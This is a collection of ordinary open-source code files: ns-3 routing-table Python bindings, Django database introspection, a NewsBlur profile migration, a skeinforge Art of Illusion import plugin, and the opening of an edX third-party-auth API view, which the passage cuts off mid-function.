[param('ns3::Ipv4Address', 'dst')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::ForceDeleteIpv4Event(ns3::Ipv4Address address) [member function]
cls.add_method('ForceDeleteIpv4Event',
'bool',
[param('ns3::Ipv4Address', 'address')])
## dsdv-rtable.h (module 'dsdv'): ns3::EventId ns3::dsdv::RoutingTable::GetEventId(ns3::Ipv4Address address) [member function]
cls.add_method('GetEventId',
'ns3::EventId',
[param('ns3::Ipv4Address', 'address')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::GetListOfAllRoutes(std::map<ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry, std::less<ns3::Ipv4Address>, std::allocator<std::pair<ns3::Ipv4Address const, ns3::dsdv::RoutingTableEntry> > > & allRoutes) [member function]
cls.add_method('GetListOfAllRoutes',
'void',
[param('std::map< ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry > &', 'allRoutes')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::GetListOfDestinationWithNextHop(ns3::Ipv4Address nxtHp, std::map<ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry, std::less<ns3::Ipv4Address>, std::allocator<std::pair<ns3::Ipv4Address const, ns3::dsdv::RoutingTableEntry> > > & dstList) [member function]
cls.add_method('GetListOfDestinationWithNextHop',
'void',
[param('ns3::Ipv4Address', 'nxtHp'), param('std::map< ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry > &', 'dstList')])
## dsdv-rtable.h (module 'dsdv'): ns3::Time ns3::dsdv::RoutingTable::Getholddowntime() const [member function]
cls.add_method('Getholddowntime',
'ns3::Time',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::LookupRoute(ns3::Ipv4Address dst, ns3::dsdv::RoutingTableEntry & rt) [member function]
cls.add_method('LookupRoute',
'bool',
[param('ns3::Ipv4Address', 'dst'), param('ns3::dsdv::RoutingTableEntry &', 'rt')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::LookupRoute(ns3::Ipv4Address id, ns3::dsdv::RoutingTableEntry & rt, bool forRouteInput) [member function]
cls.add_method('LookupRoute',
'bool',
[param('ns3::Ipv4Address', 'id'), param('ns3::dsdv::RoutingTableEntry &', 'rt'), param('bool', 'forRouteInput')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::Print(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('Print',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::Purge(std::map<ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry, std::less<ns3::Ipv4Address>, std::allocator<std::pair<ns3::Ipv4Address const, ns3::dsdv::RoutingTableEntry> > > & removedAddresses) [member function]
cls.add_method('Purge',
'void',
[param('std::map< ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry > &', 'removedAddresses')])
## dsdv-rtable.h (module 'dsdv'): uint32_t ns3::dsdv::RoutingTable::RoutingTableSize() [member function]
cls.add_method('RoutingTableSize',
'uint32_t',
[])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTable::Setholddowntime(ns3::Time t) [member function]
cls.add_method('Setholddowntime',
'void',
[param('ns3::Time', 't')])
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTable::Update(ns3::dsdv::RoutingTableEntry & rt) [member function]
cls.add_method('Update',
'bool',
[param('ns3::dsdv::RoutingTableEntry &', 'rt')])
return
def register_Ns3DsdvRoutingTableEntry_methods(root_module, cls):
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTableEntry::RoutingTableEntry(ns3::dsdv::RoutingTableEntry const & arg0) [copy constructor]
cls.add_constructor([param('ns3::dsdv::RoutingTableEntry const &', 'arg0')])
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTableEntry::RoutingTableEntry(ns3::Ptr<ns3::NetDevice> dev=0, ns3::Ipv4Address dst=ns3::Ipv4Address(), uint32_t m_seqNo=0, ns3::Ipv4InterfaceAddress iface=ns3::Ipv4InterfaceAddress(), uint32_t hops=0, ns3::Ipv4Address nextHop=ns3::Ipv4Address(), ns3::Time lifetime=ns3::Simulator::Now( ), ns3::Time SettlingTime=ns3::Simulator::Now( ), bool changedEntries=false) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::NetDevice >', 'dev', default_value='0'), param('ns3::Ipv4Address', 'dst', default_value='ns3::Ipv4Address()'), param('uint32_t', 'm_seqNo', default_value='0'), param('ns3::Ipv4InterfaceAddress', 'iface', default_value='ns3::Ipv4InterfaceAddress()'), param('uint32_t', 'hops', default_value='0'), param('ns3::Ipv4Address', 'nextHop', default_value='ns3::Ipv4Address()'), param('ns3::Time', 'lifetime', default_value='ns3::Simulator::Now( )'), param('ns3::Time', 'SettlingTime', default_value='ns3::Simulator::Now( )'), param('bool', 'changedEntries', default_value='false')])
## dsdv-rtable.h (module 'dsdv'): ns3::Ipv4Address ns3::dsdv::RoutingTableEntry::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Ipv4Address',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): bool ns3::dsdv::RoutingTableEntry::GetEntriesChanged() const [member function]
cls.add_method('GetEntriesChanged',
'bool',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RouteFlags ns3::dsdv::RoutingTableEntry::GetFlag() const [member function]
cls.add_method('GetFlag',
'ns3::dsdv::RouteFlags',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): uint32_t ns3::dsdv::RoutingTableEntry::GetHop() const [member function]
cls.add_method('GetHop',
'uint32_t',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::Ipv4InterfaceAddress ns3::dsdv::RoutingTableEntry::GetInterface() const [member function]
cls.add_method('GetInterface',
'ns3::Ipv4InterfaceAddress',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::Time ns3::dsdv::RoutingTableEntry::GetLifeTime() const [member function]
cls.add_method('GetLifeTime',
'ns3::Time',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::Ipv4Address ns3::dsdv::RoutingTableEntry::GetNextHop() const [member function]
cls.add_method('GetNextHop',
'ns3::Ipv4Address',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::Ptr<ns3::NetDevice> ns3::dsdv::RoutingTableEntry::GetOutputDevice() const [member function]
cls.add_method('GetOutputDevice',
'ns3::Ptr< ns3::NetDevice >',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::Ptr<ns3::Ipv4Route> ns3::dsdv::RoutingTableEntry::GetRoute() const [member function]
cls.add_method('GetRoute',
'ns3::Ptr< ns3::Ipv4Route >',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): uint32_t ns3::dsdv::RoutingTableEntry::GetSeqNo() const [member function]
cls.add_method('GetSeqNo',
'uint32_t',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): ns3::Time ns3::dsdv::RoutingTableEntry::GetSettlingTime() const [member function]
cls.add_method('GetSettlingTime',
'ns3::Time',
[],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::Print(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('Print',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True)
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetEntriesChanged(bool entriesChanged) [member function]
cls.add_method('SetEntriesChanged',
'void',
[param('bool', 'entriesChanged')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetFlag(ns3::dsdv::RouteFlags flag) [member function]
cls.add_method('SetFlag',
'void',
[param('ns3::dsdv::RouteFlags', 'flag')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetHop(uint32_t hopCount) [member function]
cls.add_method('SetHop',
'void',
[param('uint32_t', 'hopCount')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetInterface(ns3::Ipv4InterfaceAddress iface) [member function]
cls.add_method('SetInterface',
'void',
[param('ns3::Ipv4InterfaceAddress', 'iface')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetLifeTime(ns3::Time lifeTime) [member function]
cls.add_method('SetLifeTime',
'void',
[param('ns3::Time', 'lifeTime')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetNextHop(ns3::Ipv4Address nextHop) [member function]
cls.add_method('SetNextHop',
'void',
[param('ns3::Ipv4Address', 'nextHop')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetOutputDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('SetOutputDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetRoute(ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('SetRoute',
'void',
[param('ns3::Ptr< ns3::Ipv4Route >', 'route')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetSeqNo(uint32_t sequenceNumber) [member function]
cls.add_method('SetSeqNo',
'void',
[param('uint32_t', 'sequenceNumber')])
## dsdv-rtable.h (module 'dsdv'): void ns3::dsdv::RoutingTableEntry::SetSettlingTime(ns3::Time settlingTime) [member function]
cls.add_method('SetSettlingTime',
'void',
[param('ns3::Time', 'settlingTime')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_Hash(module.get_submodule('Hash'), root_module)
register_functions_ns3_dsdv(module.get_submodule('dsdv'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_Hash(module, root_module):
register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module)
return
def register_functions_ns3_Hash_Function(module, root_module):
return
def register_functions_ns3_dsdv(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
| gpl-2.0 |
ttglennhall/DjangoGirlsTutorial | myvenv/lib/python3.4/site-packages/django/db/backends/base/introspection.py | 93 | 7354 | from collections import namedtuple
from django.utils import six
# Structure returned by DatabaseIntrospection.get_table_list()
TableInfo = namedtuple('TableInfo', ['name', 'type'])
# Structure returned by the DB-API cursor.description interface (PEP 249)
FieldInfo = namedtuple('FieldInfo',
'name type_code display_size internal_size precision scale null_ok')
class BaseDatabaseIntrospection(object):
"""
This class encapsulates all backend-specific introspection utilities
"""
data_types_reverse = {}
def __init__(self, connection):
self.connection = connection
def get_field_type(self, data_type, description):
"""Hook for a database backend to use the cursor description to
match a Django field type to a database column.
For Oracle, the column data_type on its own is insufficient to
distinguish between a FloatField and IntegerField, for example."""
return self.data_types_reverse[data_type]
def table_name_converter(self, name):
"""Apply a conversion to the name for the purposes of comparison.
The default table name converter is for case sensitive comparison.
"""
return name
def column_name_converter(self, name):
"""
Apply a conversion to the column name for the purposes of comparison.
Uses table_name_converter() by default.
"""
return self.table_name_converter(name)
def table_names(self, cursor=None, include_views=False):
"""
Returns a list of names of all tables that exist in the database.
The returned table list is sorted by Python's default sorting. We
do NOT use database's ORDER BY here to avoid subtle differences
in sorting order between databases.
"""
def get_names(cursor):
return sorted(ti.name for ti in self.get_table_list(cursor)
if include_views or ti.type == 't')
if cursor is None:
with self.connection.cursor() as cursor:
return get_names(cursor)
return get_names(cursor)
def get_table_list(self, cursor):
"""
Returns an unsorted list of TableInfo named tuples of all tables and
views that exist in the database.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_table_list() method')
def django_table_names(self, only_existing=False, include_views=True):
"""
Returns a list of all table names that have associated Django models and
are in INSTALLED_APPS.
If only_existing is True, the resulting list will only include the tables
that actually exist in the database.
"""
from django.apps import apps
from django.db import router
tables = set()
for app_config in apps.get_app_configs():
for model in router.get_migratable_models(app_config, self.connection.alias):
if not model._meta.managed:
continue
tables.add(model._meta.db_table)
tables.update(f.m2m_db_table() for f in model._meta.local_many_to_many)
tables = list(tables)
if only_existing:
existing_tables = self.table_names(include_views=include_views)
tables = [
t
for t in tables
if self.table_name_converter(t) in existing_tables
]
return tables
def installed_models(self, tables):
"Returns a set of all models represented by the provided list of table names."
from django.apps import apps
from django.db import router
all_models = []
for app_config in apps.get_app_configs():
all_models.extend(router.get_migratable_models(app_config, self.connection.alias))
tables = list(map(self.table_name_converter, tables))
return {
m for m in all_models
if self.table_name_converter(m._meta.db_table) in tables
}
def sequence_list(self):
"Returns a list of information about all DB sequences for all models in all apps."
from django.apps import apps
from django.db import models, router
sequence_list = []
for app_config in apps.get_app_configs():
for model in router.get_migratable_models(app_config, self.connection.alias):
if not model._meta.managed:
continue
if model._meta.swapped:
continue
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
sequence_list.append({'table': model._meta.db_table, 'column': f.column})
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.local_many_to_many:
# If this is an m2m using an intermediate table,
# we don't need to reset the sequence.
if f.rel.through is None:
sequence_list.append({'table': f.m2m_db_table(), 'column': None})
return sequence_list
def get_key_columns(self, cursor, table_name):
"""
Backends can override this to return a list of (column_name, referenced_table_name,
referenced_column_name) for all key columns in given table.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_key_columns() method')
def get_primary_key_column(self, cursor, table_name):
"""
Returns the name of the primary key column for the given table.
"""
for column in six.iteritems(self.get_indexes(cursor, table_name)):
if column[1]['primary_key']:
return column[0]
return None
def get_indexes(self, cursor, table_name):
"""
Returns a dictionary of indexed fieldname -> infodict for the given
table, where each infodict is in the format:
{'primary_key': boolean representing whether it's the primary key,
'unique': boolean representing whether it's a unique index}
Only single-column indexes are introspected.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_indexes() method')
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index)
across one or more columns.
Returns a dict mapping constraint names to their attributes,
where attributes is a dict with keys:
* columns: List of columns this covers
* primary_key: True if primary key, False otherwise
* unique: True if this is a unique constraint, False otherwise
* foreign_key: (table, column) of target, or None
* check: True if check constraint, False otherwise
* index: True if index, False otherwise.
Some backends may return special constraint names that don't exist
if they don't name constraints of a certain type (e.g. SQLite)
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_constraints() method')
| mit |
canwe/NewsBlur | apps/profile/migrations/0005_view_settings_to_preferences.py | 18 | 4350 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.contrib.auth.models import User
class Migration(DataMigration):
def forwards(self, orm):
users = User.objects.all()
for user in users:
user.profile.preferences = user.profile.view_settings
user.profile.view_settings = '{}'
user.profile.save()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profile.profile': {
'Meta': {'object_name': 'Profile'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen_ip': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'last_seen_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preferences': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'view_settings': ('django.db.models.fields.TextField', [], {'default': "'{}'"})
}
}
complete_apps = ['profile']
| mit |
replicatorg/ReplicatorG | skein_engines/skeinforge-35/fabmetheus_utilities/fabmetheus_tools/interpret_plugins/xml_plugins/artofillusion.py | 8 | 11298 | """
This page is in the table of contents.
The xml.py script is an import translator plugin to get a carving from an Art of Illusion xml file.
An import plugin is a script in the interpret_plugins folder which has the function getCarving. It is meant to be run from the interpret tool. To ensure that the plugin works on platforms which do not handle file capitalization properly, give the plugin a lower case name.
The getCarving function takes the file name of an xml file and returns the carving.
This example gets a triangle mesh for the xml file boolean.xml. This example is run in a terminal in the folder which contains boolean.xml and xml.py.
> python
Python 2.5.1 (r251:54863, Sep 22 2007, 01:43:31)
[GCC 4.2.1 (SUSE Linux)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import xml
>>> xml.getCarving().getCarveRotatedBoundaryLayers()
[-1.159765625, None, [[(-18.925000000000001-2.4550000000000001j), (-18.754999999999981-2.4550000000000001j)
..
many more lines of the carving
..
An xml file can be exported from Art of Illusion by going to the "File" menu, then going into the "Export" menu item, then picking the XML choice. This will bring up the XML file chooser window, choose a place to save the file then click "OK". Leave the "compressFile" checkbox unchecked. All the objects from the scene will be exported, this plugin will ignore the light and camera. If you want to fabricate more than one object at a time, you can have multiple objects in the Art of Illusion scene and they will all be carved, then fabricated together.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.geometry.geometry_tools import face
from fabmetheus_utilities.geometry.manipulation_evaluator import matrix
from fabmetheus_utilities.geometry.geometry_utilities import boolean_geometry
from fabmetheus_utilities.geometry.geometry_utilities import booleansolid
from fabmetheus_utilities.geometry.solids import cube
from fabmetheus_utilities.geometry.solids import cylinder
from fabmetheus_utilities.geometry.solids import group
from fabmetheus_utilities.geometry.solids import sphere
from fabmetheus_utilities.geometry.solids import trianglemesh
from fabmetheus_utilities.vector3 import Vector3
from fabmetheus_utilities import euclidean
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__credits__ = 'Nophead <http://hydraraptor.blogspot.com/>\nArt of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GPL 3.0'
def getCarvingFromParser( xmlParser ):
"Get the carving for the parser."
booleanGeometry = boolean_geometry.BooleanGeometry()
artOfIllusionElement = xmlParser.getRoot()
artOfIllusionElement.object = booleanGeometry
euclidean.removeListFromDictionary( artOfIllusionElement.attributeDictionary, ['fileversion', 'xmlns:bf'] )
sceneElement = artOfIllusionElement.getFirstChildWithClassName('Scene')
xmlElements = sceneElement.getFirstChildWithClassName('objects').getChildrenWithClassName('bf:Elem')
for xmlElement in xmlElements:
processXMLElement( booleanGeometry.archivableObjects, artOfIllusionElement, xmlElement )
return booleanGeometry
def getCarvableObject(globalObject, object, xmlElement):
"Get new carvable object info."
archivableObject = globalObject()
archivableObject.xmlElement = object
object.attributeDictionary['id'] = xmlElement.getFirstChildWithClassName('name').text
object.object = archivableObject
coords = xmlElement.getFirstChildWithClassName('coords')
transformXMLElement = getTransformXMLElement(coords, 'transformFrom')
if len(transformXMLElement.attributeDictionary) < 16:
transformXMLElement = getTransformXMLElement(coords, 'transformTo')
matrix.setXMLElementDictionaryToOtherElementDictionary( transformXMLElement, object.object.matrix4X4, '', object )
return archivableObject
def getTransformXMLElement( coords, transformName ):
"Get the transform attributes."
transformXMLElement = coords.getFirstChildWithClassName( transformName )
if len( transformXMLElement.attributeDictionary ) < 16:
if 'bf:ref' in transformXMLElement.attributeDictionary:
idReference = transformXMLElement.attributeDictionary['bf:ref']
return coords.getRoot().getSubChildWithID( idReference )
return transformXMLElement
def processXMLElement( archivableObjects, parent, xmlElement ):
"Add the object info if it is carvable."
if xmlElement == None:
return
object = xmlElement.getFirstChildWithClassName('object')
if 'bf:type' not in object.attributeDictionary:
return
shapeType = object.attributeDictionary['bf:type']
if shapeType not in globalCarvableClassObjectTable:
return
carvableClassObject = globalCarvableClassObjectTable[ shapeType ]
archivableObject = getCarvableObject( carvableClassObject, object, xmlElement )
archivableObject.xmlElement.attributeDictionary['visible'] = xmlElement.attributeDictionary['visible']
archivableObject.setToObjectAttributeDictionary()
archivableObject.xmlElement.parent = parent
archivableObjects.append(archivableObject)
def removeListArtOfIllusionFromDictionary( dictionary, scrubKeys ):
"Remove the list and art of illusion keys from the dictionary."
euclidean.removeListFromDictionary( dictionary, ['bf:id', 'bf:type'] )
euclidean.removeListFromDictionary( dictionary, scrubKeys )
class BooleanSolid( booleansolid.BooleanSolid ):
"An Art of Illusion CSG object info."
def setToObjectAttributeDictionary(self):
"Set the shape of this carvable object info."
processXMLElement( self.archivableObjects, self.xmlElement, self.xmlElement.getFirstChildWithClassName('obj1') )
processXMLElement( self.archivableObjects, self.xmlElement, self.xmlElement.getFirstChildWithClassName('obj2') )
operationString = self.xmlElement.attributeDictionary['operation']
self.operationFunction = { '0': self.getUnion, '1': self.getIntersection, '2': self.getDifference, '3': self.getDifference }[ operationString ]
if operationString == '3':
self.archivableObjects.reverse()
removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, ['operation'] )
class Cube( cube.Cube ):
"An Art of Illusion Cube object."
def setToObjectAttributeDictionary(self):
"Set the shape of this carvable object info."
self.inradius = Vector3(
float( self.xmlElement.attributeDictionary['halfx'] ),
float( self.xmlElement.attributeDictionary['halfy'] ),
float( self.xmlElement.attributeDictionary['halfz'] ) )
self.xmlElement.attributeDictionary['inradius.x'] = self.xmlElement.attributeDictionary['halfx']
self.xmlElement.attributeDictionary['inradius.y'] = self.xmlElement.attributeDictionary['halfy']
self.xmlElement.attributeDictionary['inradius.z'] = self.xmlElement.attributeDictionary['halfz']
removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, ['halfx', 'halfy', 'halfz'] )
self.createShape()
class Cylinder(cylinder.Cylinder):
"An Art of Illusion Cylinder object."
def setToObjectAttributeDictionary(self):
"Set the shape of this carvable object info."
self.inradius = Vector3()
self.inradius.x = float(self.xmlElement.attributeDictionary['rx'])
self.inradius.y = float(self.xmlElement.attributeDictionary['rz'])
self.inradius.z = float(self.xmlElement.attributeDictionary['height'])
self.topOverBottom = float(self.xmlElement.attributeDictionary['ratio'])
self.xmlElement.attributeDictionary['radius.x'] = self.xmlElement.attributeDictionary['rx']
self.xmlElement.attributeDictionary['radius.y'] = self.xmlElement.attributeDictionary['rz']
self.xmlElement.attributeDictionary['topoverbottom'] = self.xmlElement.attributeDictionary['ratio']
object = self.xmlElement.object
object.matrix4X4 = object.matrix4X4.getOtherTimesSelf(matrix.getDiagonalSwitchedTetragrid(90.0, [0, 2]))
removeListArtOfIllusionFromDictionary(self.xmlElement.attributeDictionary, ['rx', 'rz', 'ratio'])
self.createShape()
class Group( group.Group ):
"An Art of Illusion Group object."
def setToObjectAttributeDictionary(self):
"Set the shape of this group."
childrenElement = self.xmlElement.parent.getFirstChildWithClassName('children')
children = childrenElement.getChildrenWithClassName('bf:Elem')
for child in children:
processXMLElement( self.archivableObjects, self.xmlElement, child )
removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, [] )
class Sphere( sphere.Sphere ):
"An Art of Illusion Sphere object."
def setToObjectAttributeDictionary(self):
"Set the shape of this carvable object."
self.radius = Vector3(
float( self.xmlElement.attributeDictionary['rx'] ),
float( self.xmlElement.attributeDictionary['ry'] ),
float( self.xmlElement.attributeDictionary['rz'] ) )
self.xmlElement.attributeDictionary['radius.x'] = self.xmlElement.attributeDictionary['rx']
self.xmlElement.attributeDictionary['radius.y'] = self.xmlElement.attributeDictionary['ry']
self.xmlElement.attributeDictionary['radius.z'] = self.xmlElement.attributeDictionary['rz']
removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, ['rx', 'ry', 'rz'] )
self.createShape()
class TriangleMesh( trianglemesh.TriangleMesh ):
"An Art of Illusion triangle mesh object."
def setToObjectAttributeDictionary(self):
"Set the shape of this carvable object info."
vertexElement = self.xmlElement.getFirstChildWithClassName('vertex')
vertexPointElements = vertexElement.getChildrenWithClassName('bf:Elem')
for vertexPointElement in vertexPointElements:
coordinateElement = vertexPointElement.getFirstChildWithClassName('r')
vertex = Vector3( float( coordinateElement.attributeDictionary['x'] ), float( coordinateElement.attributeDictionary['y'] ), float( coordinateElement.attributeDictionary['z'] ) )
self.vertexes.append(vertex)
edgeElement = self.xmlElement.getFirstChildWithClassName('edge')
edgeSubelements = edgeElement.getChildrenWithClassName('bf:Elem')
for edgeSubelementIndex in xrange( len( edgeSubelements ) ):
edgeSubelement = edgeSubelements[ edgeSubelementIndex ]
vertexIndexes = [ int( edgeSubelement.attributeDictionary['v1'] ), int( edgeSubelement.attributeDictionary['v2'] ) ]
edge = face.Edge().getFromVertexIndexes( edgeSubelementIndex, vertexIndexes )
self.edges.append( edge )
faceElement = self.xmlElement.getFirstChildWithClassName('face')
faceSubelements = faceElement.getChildrenWithClassName('bf:Elem')
for faceSubelementIndex in xrange( len( faceSubelements ) ):
faceSubelement = faceSubelements[ faceSubelementIndex ]
edgeIndexes = [ int( faceSubelement.attributeDictionary['e1'] ), int( faceSubelement.attributeDictionary['e2'] ), int( faceSubelement.attributeDictionary['e3'] ) ]
self.faces.append( face.Face().getFromEdgeIndexes( edgeIndexes, self.edges, faceSubelementIndex ) )
removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, ['closed', 'smoothingMethod'] )
globalCarvableClassObjectTable = { 'CSGObject' : BooleanSolid, 'Cube' : Cube, 'Cylinder' : Cylinder, 'artofillusion.object.NullObject' : Group, 'Sphere' : Sphere, 'TriangleMesh' : TriangleMesh }
| gpl-2.0 |
Stanford-Online/edx-platform | common/djangoapps/third_party_auth/api/views.py | 20 | 8981 | """
Third Party Auth REST API views
"""
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import Http404
from rest_framework import exceptions, status
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework_oauth.authentication import OAuth2Authentication
from social_django.models import UserSocialAuth
from openedx.core.lib.api.authentication import (
OAuth2AuthenticationAllowInactiveUser,
SessionAuthenticationAllowInactiveUser
)
from openedx.core.lib.api.permissions import ApiKeyHeaderPermission
from third_party_auth import pipeline
from third_party_auth.api import serializers
from third_party_auth.api.permissions import ThirdPartyAuthProviderApiPermission
from third_party_auth.provider import Registry
class UserView(APIView):
"""
List the third party auth accounts linked to the specified user account.
**Example Request**
GET /api/third_party_auth/v0/users/{username}
**Response Values**
If the request for information about the user is successful, an HTTP 200 "OK" response
is returned.
The HTTP 200 response has the following values.
* active: A list of all the third party auth providers currently linked
to the given user's account. Each object in this list has the
following attributes:
* provider_id: The unique identifier of this provider (string)
* name: The name of this provider (string)
* remote_id: The ID of the user according to the provider. This ID
is what is used to link the user to their edX account during
login.
"""
authentication_classes = (
# Users may want to view/edit the providers used for authentication before they've
# activated their account, so we allow inactive users.
OAuth2AuthenticationAllowInactiveUser,
SessionAuthenticationAllowInactiveUser,
)
def get(self, request, username):
"""Create, read, or update enrollment information for a user.
HTTP Endpoint for all CRUD operations for a user course enrollment. Allows creation, reading, and
updates of the current enrollment for a particular course.
Args:
request (Request): The HTTP GET request
username (str): Fetch the list of providers linked to this user
Return:
JSON serialized list of the providers linked to this user.
"""
if request.user.username != username:
# We are querying permissions for a user other than the current user.
if not request.user.is_superuser and not ApiKeyHeaderPermission().has_permission(request, self):
# Return a 403 (Unauthorized) without validating 'username', so that we
# do not let users probe the existence of other user accounts.
